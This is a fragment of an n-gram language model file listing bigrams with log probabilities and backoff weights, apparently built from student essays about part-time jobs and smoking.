-1.1786582 spend more -0.13618872
-1.5627428 gives more -0.048957378
-1.8786585 other more -0.048957378
-1.8830991 take more -0.048957378
-1.6806693 know more -0.048957378
-1.6643432 opportunity more -0.048957378
-1.5556021 done more -0.048957378
-2.1896749 fs more -0.048957378
-1.2737389 lot more -0.048957378
-2.2612493 life more -0.048957378
-1.6039462 finances more -0.048957378
-1.4414171 provides more -0.048957378
-0.9839542 contribute more -0.187397
-1.3677142 campus more -0.048957378
-1.5046054 much more -0.048957378
-1.7906424 was more -0.048957378
-1.3677142 concentrate more -0.048957378
-1.5990196 But more -0.048957378
-1.4388686 far more -0.048957378
-1.7629304 want more -0.048957378
-1.5531157 made more -0.048957378
-1.2763526 concentration more -0.048957378
-0.68865794 assure more -0.048957378
-0.9839542 bring more -0.048957378
-1.5556021 spending more -0.048957378
-0.9839542 seeing more -0.048957378
-2.4184146 more attractive -0.048957378
-3.1828704 a potential -0.048957378
-2.5346918 the potential -0.04895735
-2.9430885 their potential -0.048957378
-2.3479426 The potential -0.048957378
-1.2934115 cash potential -0.048957378
-1.7684674 full potential -0.048957378
-2.9032245 that employers -0.048957378
-3.1340673 the employers -0.048957378
-3.2669423 , employers -0.048957378
-2.332602 many employers -0.048957378
-2.671741 on employers -0.048957378
-2.1315336 -RRB- employers -0.048957378
-2.256639 so employers -0.048957378
-1.586929 potential employers -0.048957378
-1.7584107 Many employers -0.048957378
-0.6931254 Potential employers -0.048957378
-2.7198546 it helps -0.048957378
-2.4869003 part-time helps -0.048957378
-2.1890433 job helps -0.13618872
-2.0028858 employment helps -0.048957378
-2.3863747 also helps -0.048957378
-1.3888488 industry helps -0.048957378
-0.99365675 background helps -0.048957378
-2.7059574 be better -0.048957378
-1.9648439 a better -0.13332285
-2.9119232 is better -0.048957378
-3.042853 the better -0.048957378
-2.5496442 student better -0.048957378
-2.119264 will better -0.13618872
-1.384001 developed better -0.048957378
-1.4682547 do better -0.13618872
-1.8155167 A better -0.048957378
-1.2029971 much better -0.04895735
-1.4621929 effect better -0.048957378
-1.4613192 far better -0.048957378
-1.3864982 focused better -0.048957378
-0.99169886 got better -0.048957378
-2.6824691 with understanding -0.048957378
-2.9652722 for understanding -0.048957378
-2.6947107 as understanding -0.048957378
-2.4320858 an understanding -0.048957378
-2.0363014 's understanding -0.048957378
-2.6549041 or understanding -0.048957378
-2.0178785 better understanding -0.27955192
-2.9280992 , whether -0.048957378
-3.1933482 of whether -0.048957378
-3.3489213 to whether -0.048957378
-2.0238369 about whether -0.048957378
-1.2942703 decide whether -0.048957378
-3.3047535 a corporate -0.048957378
-3.321535 the organization -0.048957378
-0.69396824 corporate organization -0.048957378
-1.6442297 same organization -0.048957378
-1.1700908 service organization -0.048957378
-3.2908964 a hotel -0.048957378
-2.7131412 or hotel -0.048957378
-2.8665538 the industry -0.04895735
-2.7024844 or industry -0.048957378
-0.9947796 hotel industry -0.048957378
-3.4650414 to evolve -0.048957378
-2.4833713 with skills -0.048957378
-1.9634173 valuable skills -0.048957378
-2.7328155 the skills -0.048957378
-2.6885328 , skills -0.048957378
-2.216198 many skills -0.048957378
-2.2984886 their skills -0.048957378
-2.21989 study skills -0.048957378
-1.5592585 Such skills -0.04895735
-2.1902359 The skills -0.048957378
-2.521257 are skills -0.048957378
-1.3691082 practical skills -0.048957378
-1.3192421 academic skills -0.048957378
-0.6894921 evolve skills -0.048957378
-1.6470989 These skills -0.048957378
-0.4076312 leadership skills -0.048957378
-0.98560214 interpersonal skills -0.048957378
-1.5120939 management skills -0.048957378
-1.2792084 increase skills -0.048957378
-1.5414642 people skills -0.04895735
-2.166615 what skills -0.048957378
-1.0266905 social skills -0.1722646
-2.2807539 life skills -0.048957378
-1.7173961 personal skills -0.048957378
-1.3034346 these skills -0.04895735
-0.6894921 transferable skills -0.048957378
-0.6894921 countless skills -0.048957378
-0.6894921 apparent skills -0.048957378
-1.3754653 finding skills -0.048957378
-2.1159384 learn skills -0.048957378
-1.7557037 workplace skills -0.048957378
-1.3691082 basic skills -0.048957378
-1.5080532 obtain skills -0.048957378
-0.6894921 managerial skills -0.048957378
-1.3691082 invaluable skills -0.048957378
-0.6894921 employability skills -0.048957378
-0.6894921 time-management skills -0.048957378
-2.5736907 it important -0.048957378
-1.6911901 is important -0.5213089
-2.5400212 not important -0.187397
-2.766682 and important -0.048957378
-1.0435919 very important -0.3183926
-2.5629277 as important -0.048957378
-2.2866995 also important -0.048957378
-1.5393704 an important -0.08422062
-2.150213 only important -0.048957378
-2.197098 so important -0.048957378
-1.9833093 's important -0.187397
-1.2292743 most important -0.048957378
-2.2330184 are important -0.048957378
-1.2823725 Another important -0.048957378
-1.799247 more important -0.04895735
-2.2894611 skills important -0.048957378
-2.3302038 all important -0.048957378
-1.5696933 teach important -0.048957378
-2.2620225 fs important -0.13618872
-2.1419766 these important -0.048957378
-2.1411133 learn important -0.048957378
-1.1609298 extreme important -0.048957378
-0.69088596 necessarily important -0.048957378
-1.1609298 personally important -0.048957378
-1.1609298 indeed important -0.048957378
-0.69088596 terribly important -0.048957378
-3.3624787 the employer -0.048957378
-2.3673859 The employer -0.048957378
-1.5946901 potential employer -0.048957378
-2.0134587 <s> These -0.071063936
-2.3904223 may include -0.048957378
-2.030206 activities include -0.048957378
-1.2950919 factors include -0.048957378
-3.4000094 the leadership -0.048957378
-1.1708648 include leadership -0.048957378
-3.4931862 , commitment -0.048957378
-3.2676826 of commitment -0.048957378
-3.2908964 a team -0.048957378
-3.4931862 , team -0.048957378
-0.995135 team spirit -0.048957378
-3.1215048 in interpersonal -0.048957378
-2.749941 and interpersonal -0.187397
-3.321535 the management -0.048957378
-1.7073053 time management -0.099168696
-2.0071845 financial management -0.048957378
-1.5367397 business management -0.048957378
-2.5801177 student taking -0.048957378
-1.8278263 by taking -0.048957378
-2.6638196 and taking -0.048957378
-3.087084 of taking -0.048957378
-2.5388384 from taking -0.048957378
-2.3818967 students taking -0.048957378
-2.7776954 are taking -0.048957378
-1.7590209 enjoy taking -0.048957378
-1.6373856 just taking -0.048957378
-1.6373856 since taking -0.048957378
-1.806743 taking criticism -0.048957378
-0.6942867 criticism positively -0.048957378
-3.09512 <s> Besides -0.048957378
-3.4860332 <s> knowledge -0.048957378
-2.814926 the knowledge -0.048957378
-2.385586 more knowledge -0.048957378
-2.3729742 my knowledge -0.048957378
-0.69354665 acquiring knowledge -0.048957378
-1.3888488 invaluable knowledge -0.048957378
-0.69354665 REAL knowledge -0.048957378
-2.444559 experience gained -0.048957378
-2.3741484 skills gained -0.048957378
-1.5955248 knowledge gained -0.048957378
-1.7183528 graduation through -0.048957378
-2.6834726 time through -0.048957378
-1.1646541 gained through -0.048957378
-1.9368964 themselves through -0.048957378
-1.5803545 learned through -0.048957378
-1.3830067 earned through -0.048957378
-2.377569 them through -0.048957378
-1.9823496 society through -0.048957378
-0.6921442 met through -0.048957378
-1.2485532 way through -0.048957378
-1.7527289 go through -0.048957378
-1.5246081 Working through -0.048957378
-1.8130639 right through -0.048957378
-1.2873054 pass through -0.048957378
-0.99086237 goes through -0.048957378
-1.1646541 kids through -0.048957378
-0.6921442 daughters through -0.048957378
-3.2496762 the educational -0.048957378
-2.7056403 and educational -0.187397
-2.9430885 their educational -0.048957378
-2.2637763 some educational -0.048957378
-1.3895458 his\/her educational -0.048957378
-1.3899099 tertiary educational -0.048957378
-2.022295 student who -0.048957378
-3.0300741 , who -0.048957378
-1.4702351 students who -0.105123706
-1.895541 jobs who -0.048957378
-2.4962344 or who -0.048957378
-0.988917 candidates who -0.048957378
-1.6639643 employers who -0.048957378
-1.3539498 people who -0.20946135
-1.2834638 People who -0.048957378
-1.516955 workers who -0.048957378
-1.8033544 customers who -0.048957378
-0.80066806 those who -0.048957378
-0.988917 worker who -0.048957378
-1.6198496 families who -0.048957378
-1.6625155 Students who -0.048957378
-1.2834638 anyone who -0.048957378
-1.7037203 person who -0.048957378
-1.2834638 co-workers who -0.048957378
-1.2834638 Those who -0.048957378
-1.2834638 groups who -0.048957378
-0.988917 individuals who -0.048957378
-0.69116527 Anyone who -0.048957378
-1.1617546 patrons who -0.048957378
-1.2849771 non-smokers who -0.048957378
-2.720708 not productive -0.048957378
-2.9430885 their productive -0.048957378
-2.0743403 become productive -0.048957378
-2.8351026 are productive -0.048957378
-2.3916345 more productive -0.048957378
-1.688467 something productive -0.048957378
-2.7082691 I developed -0.048957378
-2.8269253 be developed -0.048957378
-2.0068414 well developed -0.048957378
-2.3660924 skills developed -0.048957378
-1.961792 other developed -0.048957378
-3.4000094 the overall -0.048957378
-1.3922309 developed overall -0.048957378
-0.9947796 overall personality -0.048957378
-1.7695215 individual personality -0.048957378
-0.69410884 inclined personality -0.048957378
-1.2678041 be able -1.182642
-2.5235014 is able -0.187397
-2.6883335 not able -0.048957378
-2.080263 then able -0.048957378
-2.2144513 only able -0.048957378
-2.3036728 are able -0.27955192
-1.7239105 were able -0.048957378
-1.8528606 was able -0.048957378
-1.2917377 Being able -0.187397
-3.4650414 to assimilate -0.048957378
-2.4119422 for themselves -0.048957378
-2.6368585 it themselves -0.048957378
-2.6122186 not themselves -0.048957378
-2.345771 by themselves -0.048957378
-1.5246081 positions themselves -0.048957378
-0.6921442 assimilate themselves -0.048957378
-1.5235524 see themselves -0.048957378
-0.99086237 keeping themselves -0.048957378
-1.5793041 teach themselves -0.048957378
-1.8918848 support themselves -0.048957378
-1.3819399 manage themselves -0.048957378
-0.99086237 manifest themselves -0.048957378
-0.6921442 situate themselves -0.048957378
-0.6921442 hurting themselves -0.048957378
-0.6921442 dedicating themselves -0.048957378
-0.6921442 exposing themselves -0.048957378
-0.8048233 smokers themselves -0.048957378
-2.7927094 and into -0.048957378
-1.9224067 themselves into -0.048957378
-1.5718107 put into -0.13618872
-1.4531673 effort into -0.048957378
-1.2849771 fit into -0.048957378
-1.5759982 entering into -0.048957378
-1.4531673 late into -0.048957378
-1.1632792 directly into -0.048957378
-1.5732803 enter into -0.048957378
-0.988917 classrooms into -0.048957378
-0.7076173 insight into -0.048957378
-0.69116527 assimilation into -0.048957378
-0.69116527 toes into -0.048957378
-0.69116527 converted into -0.048957378
-1.2849771 mature into -0.048957378
-1.2849771 taken into -0.048957378
-0.988917 turn into -0.048957378
-0.69116527 input into -0.048957378
-1.2834638 over into -0.048957378
-0.988917 women into -0.048957378
-0.69116527 energies into -0.048957378
-0.988917 divided into -0.048957378
-0.69116527 pressured into -0.048957378
-0.69116527 integrated into -0.048957378
-2.3965085 this environment -0.048957378
-2.7687883 the environment -0.048957378
-2.5071068 working environment -0.048957378
-2.2680779 school environment -0.048957378
-2.1980197 work environment -0.048957378
-1.873338 an environment -0.048957378
-2.0880997 This environment -0.048957378
-1.386072 healthy environment -0.048957378
-0.9925369 smoke-free environment -0.048957378
-0.9925369 smoky environment -0.048957378
-0.6929851 smoke-filled environment -0.048957378
-2.2922049 be learned -0.048957378
-2.7526727 have learned -0.048957378
-2.1522174 you learned -0.048957378
-2.0000803 are learned -0.13618872
-1.9118223 They learned -0.048957378
-0.9939372 theory learned -0.048957378
-2.408415 a position -0.04895735
-2.489963 part-time position -0.048957378
-1.5917089 graduate position -0.048957378
-0.9939372 each position -0.048957378
-1.16925 manager position -0.048957378
-0.69368714 humble position -0.048957378
-2.7267487 will expand -0.048957378
-3.2102208 and increase -0.048957378
-2.1736271 could increase -0.048957378
-1.644695 never increase -0.048957378
-0.69396824 continual increase -0.048957378
-3.246793 and abilities -0.048957378
-2.9977748 their abilities -0.048957378
-2.0483317 's abilities -0.048957378
-2.3900154 it at -0.048957378
-2.3500113 be at -0.048957378
-2.347194 part-time at -0.048957378
-2.2968395 is at -0.048957378
-2.3370936 not at -0.048957378
-2.5826097 in at -0.048957378
-1.4147533 study at -0.13618872
-1.4278648 example at -0.048957378
-1.7799807 little at -0.048957378
-2.2175992 experience at -0.048957378
-1.6079988 working at -0.04895735
-2.1040056 time at -0.048957378
-2.234136 jobs at -0.048957378
-1.6450908 work at -0.048957378
-1.9357077 then at -0.048957378
-2.308092 money at -0.048957378
-1.9892414 most at -0.048957378
-1.5814797 degree at -0.048957378
-1.9764487 or at -0.048957378
-1.5376908 learned at -0.048957378
-1.1467421 abilities at -0.048957378
-1.6910964 food at -0.048957378
-1.9244258 good at -0.048957378
-0.9448805 while at -0.40449065
-2.1946948 all at -0.048957378
-1.9657154 because at -0.048957378
-1.8329048 provide at -0.048957378
-1.4242697 usually at -0.048957378
-1.1467421 staying at -0.048957378
-1.4242697 late at -0.048957378
-1.7506284 customers at -0.048957378
-1.6233808 success at -0.048957378
-1.7188667 days at -0.048957378
-1.6199963 week at -0.048957378
-1.7127738 home at -0.048957378
-1.4871894 obtain at -0.048957378
-1.501507 discipline at -0.048957378
-0.686027 interns at -0.048957378
-1.2637045 needed at -0.048957378
-1.4242697 live at -0.048957378
-0.686027 impressed at -0.048957378
-1.5849212 spent at -0.048957378
-1.3564417 public at -0.048957378
-1.3564417 look at -0.048957378
-1.5814797 me at -0.048957378
-1.352782 goal at -0.048957378
-1.4871894 banned at -0.048957378
-1.3712845 dealing at -0.048957378
-0.686027 guides at -0.048957378
-0.686027 unit at -0.048957378
-0.686027 course-load at -0.048957378
-0.97877645 population at -0.048957378
-0.686027 shocked at -0.048957378
-0.97877645 perform at -0.048957378
-0.97877645 solely at -0.048957378
-0.686027 mesmerized at -0.048957378
-0.686027 winning at -0.048957378
-0.686027 Troubles at -0.048957378
-1.352782 eat at -0.048957378
-1.9982839 smoking at -0.048957378
-1.9248092 smoke at -0.048957378
-2.45335 this same -0.048957378
-2.2243817 the same -0.2604024
-2.8176763 time benefiting -0.048957378
-2.7827518 be financially -0.048957378
-3.0886452 and financially -0.048957378
-2.0680156 become financially -0.048957378
-1.9562662 themselves financially -0.048957378
-0.6934062 benefiting financially -0.048957378
-1.8264393 A financially -0.048957378
-1.292295 Being financially -0.048957378
-0.6934062 succeed financially -0.048957378
-1.4990113 <s> There -0.545116
-2.452609 for two -0.187397
-2.7428439 have two -0.048957378
-1.6409096 following two -0.048957378
-2.8200238 are two -0.187397
-2.0927913 into two -0.048957378
-2.211647 these two -0.048957378
-1.1688302 Reason two -0.048957378
-2.636479 I first -0.048957378
-2.6681805 it first -0.048957378
-2.0159044 the first -0.13332285
-1.7764169 their first -0.099168696
-2.3959835 experience first -0.048957378
-1.7890602 gain first -0.048957378
-2.305698 The first -0.25144583
-2.1289778 you first -0.048957378
-1.8188939 your first -0.048957378
-2.02572 must first -0.048957378
-1.8228351 way first -0.048957378
-1.8055474 my first -0.048957378
-1.462143 My first -0.048957378
-2.5346918 the issue -0.13618872
-2.4390335 an issue -0.048957378
-2.5278847 money issue -0.048957378
-2.138197 social issue -0.048957378
-1.16925 big issue -0.048957378
-0.69368714 safety issue -0.048957378
-1.8631858 <s> Many -0.122193575
-3.4931862 , Many -0.048957378
-2.9818435 students complain -0.048957378
-2.156618 I don -0.40449065
-2.968909 that don -0.048957378
-1.9445541 they don -0.40449065
-1.7057605 who don -0.048957378
-2.276979 we don -0.048957378
-2.1142278 can ft -0.048957378
-0.21326932 don ft -0.15221639
-0.40913635 didn ft -0.048957378
-0.6932658 wasn ft -0.048957378
-0.6932658 isn ft -0.048957378
-0.6932658 couldn ft -0.048957378
-0.6932658 aren ft -0.048957378
-0.9930965 won ft -0.048957378
-0.6932658 Don ft -0.048957378
-2.0794318 having enough -0.048957378
-2.8718393 is enough -0.048957378
-1.8451836 not enough -0.04895735
-2.1794941 have enough -0.048957378
-1.8890141 ft enough -0.048957378
-2.0396717 good enough -0.048957378
-1.6303203 earn enough -0.048957378
-0.99086237 stressful enough -0.048957378
-1.1646541 fortunate enough -0.048957378
-1.1646541 soon enough -0.048957378
-1.526558 save enough -0.048957378
-1.1646541 fast enough -0.048957378
-0.5841781 old enough -0.187397
-0.6921442 adequate enough -0.048957378
-0.6921442 devoting enough -0.048957378
-0.6921442 enlightened enough -0.048957378
-0.99086237 justified enough -0.048957378
-2.6187377 can spend -0.048957378
-2.6486106 not spend -0.048957378
-2.6349013 and spend -0.04895735
-1.9268204 to spend -0.07613316
-2.3729234 students spend -0.048957378
-1.6435541 should spend -0.099168696
-2.751095 they spend -0.048957378
-1.7537347 To spend -0.048957378
-2.2472656 who spend -0.048957378
-2.1441891 could spend -0.048957378
-2.02572 must spend -0.048957378
-1.5273678 either spend -0.048957378
-1.6965742 we spend -0.187397
-2.3403172 the food -0.048957378
-2.90795 , food -0.048957378
-3.1476786 of food -0.048957378
-3.2905889 to food -0.048957378
-2.6941473 on food -0.048957378
-1.1688302 fast food -0.048957378
-1.1688302 buy food -0.048957378
-1.6892436 several times -0.048957378
-3.0728445 in times -0.048957378
-2.5156648 at times -0.048957378
-0.9942178 Often times -0.048957378
-0.9942178 vacation times -0.048957378
-1.9320052 <s> Having -0.58723795
-2.710804 it gives -0.048957378
-2.4838593 part-time gives -0.048957378
-2.7126353 job gives -0.048957378
-3.3144484 , gives -0.048957378
-2.3805175 also gives -0.048957378
-2.0984945 This gives -0.048957378
-1.4667772 cards gives -0.048957378
-0.9933765 dorm gives -0.048957378
-1.8501036 this need -0.048957378
-2.707645 the need -0.048957378
-2.596519 will need -0.048957378
-2.0085864 often need -0.048957378
-2.9119923 in need -0.048957378
-2.8984869 and need -0.048957378
-1.6250015 students need -0.3194954
-2.3317747 may need -0.048957378
-2.238277 they need -0.048957378
-2.1162357 you need -0.048957378
-2.2326763 who need -0.048957378
-1.8890141 ft need -0.048957378
-1.9116974 no need -0.048957378
-1.6282278 force need -0.048957378
-2.2800672 would need -0.048957378
-2.2293367 we need -0.048957378
-1.1646541 essentially need -0.048957378
-2.469975 an emergency -0.048957378
-3.644728 <s> Saving -0.048957378
-3.102048 is earned -0.048957378
-2.7835681 have earned -0.048957378
-2.543778 money earned -0.048957378
-1.7616906 be good -0.20946135
-1.8140819 a good -0.13418062
-2.4851818 is good -0.048957378
-3.0035503 the good -0.048957378
-2.3028388 many good -0.048957378
-2.9159434 and good -0.048957378
-3.0959117 to good -0.048957378
-2.1185026 very good -0.048957378
-2.273176 are good -0.048957378
-1.2878569 Another good -0.048957378
-2.3346374 more good -0.048957378
-2.3781981 all good -0.048957378
-1.2878569 another good -0.048957378
-2.3142414 fs good -0.048957378
-1.7143714 were good -0.048957378
-1.8446414 getting good -0.048957378
-2.4087367 this idea -0.048957378
-2.5159528 the idea -0.20946135
-1.8797346 little idea -0.048957378
-2.4185147 an idea -0.048957378
-1.6391098 bad idea -0.048957378
-2.0122402 better idea -0.048957378
-1.4990695 good idea -0.187397
-2.3549309 fs idea -0.048957378
-0.9930965 clear idea -0.048957378
-2.3758469 The alternative -0.048957378
-3.1303647 is asking -0.048957378
-2.138573 with others -0.13618872
-2.3429945 many others -0.048957378
-3.126527 of others -0.048957378
-2.6865494 on others -0.048957378
-0.6934062 asking others -0.048957378
-1.3753816 what others -0.27955192
-2.059495 because others -0.048957378
-0.6934062 innumerable others -0.048957378
-2.2106335 is like -0.04895735
-3.08607 the like -0.048957378
-3.2241242 , like -0.048957378
-2.4493282 jobs like -0.048957378
-2.0711772 -LRB- like -0.048957378
-1.992437 society like -0.048957378
-1.167493 countries like -0.048957378
-0.69284487 Skills like -0.048957378
-0.99225736 seem like -0.048957378
-0.99225736 fd like -0.048957378
-0.58463883 seems like -0.048957378
-0.69284487 tastes like -0.048957378
-2.8356202 that parents -0.048957378
-2.7172563 the parents -0.048957378
-2.3502622 by parents -0.048957378
-1.2830745 their parents -0.24459879
-2.258325 if parents -0.048957378
-2.0103927 's parents -0.048957378
-1.8416208 like parents -0.048957378
-1.2476163 your parents -0.048957378
-2.055945 If parents -0.048957378
-2.3142414 fs parents -0.048957378
-2.3262591 my parents -0.048957378
-1.1650699 whose parents -0.048957378
-1.5245031 All parents -0.048957378
-1.9344316 our parents -0.048957378
-2.0122468 his parents -0.048957378
-1.3826258 his\/her parents -0.048957378
-2.1336222 with friends -0.048957378
-3.0386198 and friends -0.048957378
-3.087084 of friends -0.048957378
-2.6223552 or friends -0.048957378
-1.851442 new friends -0.048957378
-1.8100215 my friends -0.048957378
-1.4646233 My friends -0.048957378
-1.948986 our friends -0.048957378
-1.5302515 long friends -0.048957378
-0.6931254 dissolute friends -0.048957378
-1.9320052 <s> However -0.58723795
-2.6943817 be doing -0.048957378
-2.8981466 is doing -0.048957378
-2.5423484 student doing -0.048957378
-2.396164 , doing -0.048957378
-2.6300335 not doing -0.048957378
-2.1851182 and doing -0.048957378
-3.0017767 of doing -0.048957378
-2.506493 from doing -0.048957378
-2.6988692 time doing -0.048957378
-2.5730033 or doing -0.048957378
-2.7151973 are doing -0.048957378
-1.582397 By doing -0.048957378
-2.0474281 while doing -0.048957378
-2.097896 up doing -0.048957378
-1.632501 spent doing -0.048957378
-3.246793 and again -0.048957378
-2.1202812 there again -0.048957378
-2.2854962 so again -0.048957378
-3.1764908 and put -0.048957378
-2.250529 to put -0.1765346
-2.3815436 may put -0.048957378
-2.434271 them put -0.048957378
-0.9942178 fve put -0.048957378
-2.2803774 some strains -0.048957378
-3.284121 the relationships -0.048957378
-0.9942178 interpersonal relationships -0.048957378
-0.9942178 crucial relationships -0.048957378
-0.8902731 workplace relationships -0.04895735
-0.6938276 friendly relationships -0.048957378
-1.7841849 with people -0.04895735
-2.3405106 for people -0.048957378
-2.6582167 that people -0.048957378
-2.2324853 the people -0.048957378
-1.747077 many people -0.048957378
-2.4543896 and people -0.048957378
-2.0001738 of people -0.048957378
-2.3873038 from people -0.048957378
-2.501654 as people -0.048957378
-1.5582286 Such people -0.048957378
-1.8272774 less people -0.048957378
-2.5535123 college people -0.048957378
-2.0481818 most people -0.048957378
-1.3684433 Most people -0.048957378
-1.718035 Many people -0.048957378
-2.2223701 when people -0.048957378
-1.3638679 other people -0.048957378
-2.2828953 all people -0.048957378
-1.9591949 make people -0.048957378
-1.9439257 where people -0.048957378
-1.4450549 different people -0.048957378
-0.689353 Young people -0.048957378
-0.9450489 Some people -0.048957378
-1.5604409 meet people -0.048957378
-1.8015715 new people -0.048957378
-1.8723335 hard people -0.048957378
-0.38554367 young people -0.087055564
-1.1564206 rounded people -0.048957378
-1.5049624 All people -0.048957378
-1.2764184 Those people -0.048957378
-0.98532706 meeting people -0.048957378
-0.689353 viable people -0.048957378
-0.689353 aged people -0.048957378
-0.689353 elderly people -0.048957378
-0.689353 employ people -0.048957378
-0.689353 urge people -0.048957378
-1.2764184 rights people -0.048957378
-2.7925994 have borrowed -0.048957378
-2.1655056 you borrowed -0.048957378
-1.4473944 <s> They -0.28012446
-2.6214874 student eventually -0.048957378
-2.7167566 and eventually -0.048957378
-2.3815436 may eventually -0.048957378
-2.2780018 who eventually -0.048957378
-2.4379478 all eventually -0.048957378
-2.6128922 student see -0.048957378
-2.8730767 to see -0.048957378
-2.933356 students see -0.048957378
-2.8121924 they see -0.048957378
-1.4679527 eventually see -0.048957378
-1.8866099 really see -0.048957378
-3.3047535 a evampire -0.048957378
-0.6942867 evampire f. -0.048957378
-1.3798332 <s> This -0.21703526
-0.6942267 f. This -0.048957378
-3.0414262 is especially -0.048957378
-3.3677967 , especially -0.048957378
-3.1451926 and especially -0.048957378
-1.2934115 carefully especially -0.048957378
-1.6870786 employers especially -0.048957378
-2.4508684 people especially -0.048957378
-3.0414262 is true -0.048957378
-2.5346918 the true -0.04895735
-1.4683161 especially true -0.048957378
-1.2934115 particularly true -0.048957378
-1.9589672 our true -0.048957378
-0.69368714 rings true -0.048957378
-1.8620814 <s> College -0.38104916
-3.428628 , College -0.048957378
-2.364556 many College -0.048957378
-2.0151875 from College -0.048957378
-2.1471612 will show -0.048957378
-3.4163227 to show -0.048957378
-2.410627 also show -0.048957378
-2.84126 they fre -0.048957378
-2.162571 you fre -0.048957378
-1.6454853 There fre -0.048957378
-1.295562 fre putting -0.048957378
-0.6942267 started putting -0.048957378
-2.5476494 the effort -0.04895735
-2.0984125 any effort -0.048957378
-3.2102208 and effort -0.048957378
-3.21812 of effort -0.048957378
-2.7357929 as keeping -0.048957378
-2.1050158 into keeping -0.048957378
-3.2908964 a stable -0.048957378
-1.6467657 financially stable -0.048957378
-2.569465 <s> People -0.048957378
-2.8983755 are willing -0.048957378
-2.415659 more willing -0.048957378
-1.5902163 can help -0.048957378
-1.370441 will help -0.04895735
-2.6486106 not help -0.048957378
-1.787646 to help -0.11268411
-2.648625 as help -0.048957378
-1.8203847 also help -0.187397
-1.9133708 jobs help -0.187397
-2.3477387 may help -0.048957378
-1.6435541 should help -0.04895735
-2.751095 they help -0.048957378
-1.5887513 could help -0.048957378
-1.462143 usually help -0.048957378
-1.5836447 perhaps help -0.048957378
-2.6513362 that when -0.048957378
-2.4861102 job when -0.048957378
-2.6630864 is when -0.048957378
-2.3315365 , when -0.048957378
-1.9360907 field when -0.048957378
-2.636664 and when -0.048957378
-2.2129443 study when -0.048957378
-2.6798315 students when -0.048957378
-2.54811 time when -0.048957378
-2.1814945 school when -0.048957378
-1.9957185 -LRB- when -0.048957378
-2.157253 so when -0.048957378
-2.013774 even when -0.048957378
-2.2306337 more when -0.048957378
-1.4230365 better when -0.048957378
-1.7206336 food when -0.048957378
-2.2870786 people when -0.048957378
-2.1210685 help when -0.048957378
-2.2408266 do when -0.187397
-1.6671537 opportunity when -0.048957378
-1.1584141 distractions when -0.048957378
-1.3701252 grades when -0.048957378
-0.68921393 useless when -0.048957378
-2.2066634 fs when -0.048957378
-2.1496866 education when -0.048957378
-1.5040536 quit when -0.048957378
-1.6856871 lives when -0.048957378
-1.9400117 things when -0.048957378
-1.156013 discover when -0.048957378
-1.614826 later when -0.048957378
-0.9850521 fact when -0.048957378
-1.2758812 stage when -0.048957378
-0.9850521 car when -0.048957378
-0.68921393 bubble when -0.048957378
-0.68921393 established when -0.048957378
-0.68921393 whatsoever when -0.048957378
-0.9850521 ill when -0.048957378
-0.68921393 pains when -0.048957378
-3.4931862 , trying -0.048957378
-2.0087757 are trying -0.27955192
-2.1099067 I do -0.11268411
-2.7681105 that do -0.048957378
-1.4528781 often do -0.048957378
-2.562779 not do -0.048957378
-2.8063323 and do -0.048957378
-1.501259 to do -0.13395807
-2.0476158 students do -0.04895735
-2.4553785 should do -0.048957378
-2.1608806 only do -0.048957378
-1.5954541 they do -0.3464987
-1.7385017 To do -0.048957378
-2.055131 even do -0.048957378
-1.6869833 who do -0.13618872
-2.356268 people do -0.048957378
-1.4539756 eventually do -0.048957378
-2.2579482 would do -0.048957378
-1.6210366 families do -0.048957378
-1.8292019 Japan do -0.048957378
-1.669193 age do -0.048957378
-1.3674418 we do -0.04895735
-1.1621677 general do -0.048957378
-0.691305 programs do -0.048957378
-0.691305 Nor do -0.048957378
-2.2247844 is something -0.13618872
-2.192501 studying something -0.048957378
-2.087322 -LRB- something -0.048957378
-1.5355865 understanding something -0.048957378
-2.0006297 doing something -0.048957378
-2.362637 do something -0.04895735
-1.8009129 want something -0.048957378
-2.9719586 in your -0.048957378
-2.543445 to your -0.13618872
-2.657421 on your -0.048957378
-2.2703896 if your -0.048957378
-2.1321318 but your -0.048957378
-1.8527182 pay your -0.048957378
-2.6967838 have your -0.048957378
-0.40896884 expanding your -0.048957378
-0.99225736 increasing your -0.048957378
-1.5862222 earning your -0.048957378
-0.99225736 enjoying your -0.048957378
-0.99225736 namely your -0.048957378
-1.7205752 to earn -0.35108593
-2.821667 they earn -0.048957378
-1.9147383 ft earn -0.048957378
-1.5351007 actually earn -0.048957378
-2.276979 we earn -0.048957378
-2.8890827 for other -0.048957378
-2.7474363 the other -0.40449065
-1.4586887 many other -0.04895735
-1.5134407 any other -0.048957378
-2.9592848 in other -0.048957378
-2.6349013 and other -0.048957378
-3.1516366 to other -0.048957378
-2.305698 The other -0.048957378
-2.1078584 or other -0.048957378
-1.718434 know other -0.048957378
-2.2460973 what other -0.048957378
-2.0018208 about other -0.048957378
-0.991978 affect other -0.048957378
-2.4545655 part-time while -0.048957378
-1.8528453 job while -0.2463506
-3.11635 , while -0.048957378
-1.440128 working while -0.187397
-2.6759744 time while -0.048957378
-2.4164965 jobs while -0.048957378
-1.6769817 work while -0.187397
-1.750253 tuition while -0.048957378
-2.0756736 parents while -0.048957378
-0.69200426 undertaken while -0.048957378
-1.627021 force while -0.048957378
-1.5226038 So while -0.048957378
-1.6715331 worked while -0.048957378
-1.7815877 workplace while -0.048957378
-1.9791558 things while -0.048957378
-0.99058396 married while -0.048957378
-0.69200426 mentors while -0.048957378
-1.5793368 spending while -0.048957378
-2.569465 <s> Of -0.20946135
-3.2358162 a major -0.048957378
-3.2102208 and major -0.048957378
-2.4448311 their major -0.048957378
-1.2530801 your major -0.13618872
-1.8913437 an advantage -0.048957378
-3.120598 is teaching -0.048957378
-1.1708648 concerned teaching -0.048957378
-2.6259773 can take -0.048957378
-2.6350343 will take -0.048957378
-2.6443284 and take -0.048957378
-1.986623 to take -0.11268411
-2.507319 should take -0.048957378
-1.6518091 only take -0.048957378
-2.7593143 they take -0.048957378
-2.1322224 you take -0.048957378
-2.0280702 must take -0.048957378
-2.2994013 would take -0.048957378
-1.6343127 families take -0.048957378
-1.2900703 easily take -0.048957378
-2.7796392 job tutoring -0.048957378
-2.6331224 with high -0.048957378
-2.6583917 a high -0.048957378
-2.9592848 in high -0.048957378
-3.033918 of high -0.048957378
-2.1282482 very high -0.048957378
-2.5191436 from high -0.048957378
-2.7391284 are high -0.048957378
-2.078092 into high -0.048957378
-0.6927047 tutoring high -0.048957378
-1.9059 too high -0.048957378
-0.991978 Getting high -0.048957378
-0.991978 extremely high -0.048957378
-0.6927047 Achieving high -0.048957378
-1.9786379 a chance -0.5805819
-2.5411224 the chance -0.13618872
-2.0431504 first chance -0.048957378
-1.3902439 last chance -0.048957378
